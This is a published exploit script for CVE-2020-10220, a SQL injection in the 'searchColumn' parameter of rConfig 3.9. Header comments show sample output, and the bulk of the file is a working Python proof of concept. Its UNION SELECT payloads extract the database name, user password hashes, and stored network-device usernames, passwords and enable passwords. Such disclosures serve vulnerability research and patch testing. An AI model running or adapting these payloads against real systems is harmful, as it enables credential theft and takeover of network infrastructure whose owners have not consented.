# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection# Exploit Author: vikingfr# Date: 2020-03-03# CVE-2020-10220# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip# Install scripts: # https://www.rconfig.com/downloads/scripts/install_rConfig.sh# https://www.rconfig.com/downloads/scripts/centos7_install.sh# https://www.rconfig.com/downloads/scripts/centos6_install.sh# Version: tested v3.9.4# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24## Notes : If you want to reproduce in your lab environment follow those links :# http://help.rconfig.com/gettingstarted/installation# then# http://help.rconfig.com/gettingstarted/postinstall## $ python3 rconfig_sqli.py https://1.1.1.1# rconfig 3.9 - SQL Injection PoC# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php# [+] Extracting the current DB name :# rconfig2# [+] Extracting 10 first users :# admin:1:63a9f0ea7bb98050796b649e85481845# Maybe no more information ?# Maybe no more information ?# [snip]# [+] Extracting 10 first devices :# 127-0-0-1:127.0.0.1::ocdvulnpass:# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret# Maybe no more information ?# Maybe no more information ?# [snip]# Done#!/usr/bin/python3import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)print("rconfig 3.9 - SQL Injection PoC")iflen(sys.argv)!=2:print("[+] Usage : ./rconfig_exploit.py https://target")
exit()
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target =given_target
target += vuln_page
target += vuln_parameters
request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)defextractDBinfos(myTarget=None,myPayload=None):"""
Extract information from database
Args:
- target+payload (String)
Returns:
- payload result (String)
"""
result =""
encoded_request = myTarget+myPayload
exploit_req = request.get(encoded_request)if'[PWN]'instr(exploit_req.content):
result =str(exploit_req.content).split('[PWN]')[1]else:
result="Maybe no more information ?"return result
if dashboard_request.status_code !=404:print("[+] Triggering the payloads on "+given_target+vuln_page)# get the db nameprint("[+] Extracting the current DB name :")
db_payload ="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
db_name = extractDBinfos(target,db_payload)print(db_name)# DB extract usersprint("[+] Extracting 10 first users :")for i inrange(0,10):
user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
user_h = extractDBinfos(target,user1_payload)#print ("[+] Dump device "+str(i))print(user_h)# DB extract devices informationprint("[+] Extracting 10 first devices :")for i inrange(0,10):
device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
device_h = extractDBinfos(target,device_payload)#print ("[+] Dump device "+str(i))print(device_h)print("Done")else:print("[-] Please verify the URI")
exit()
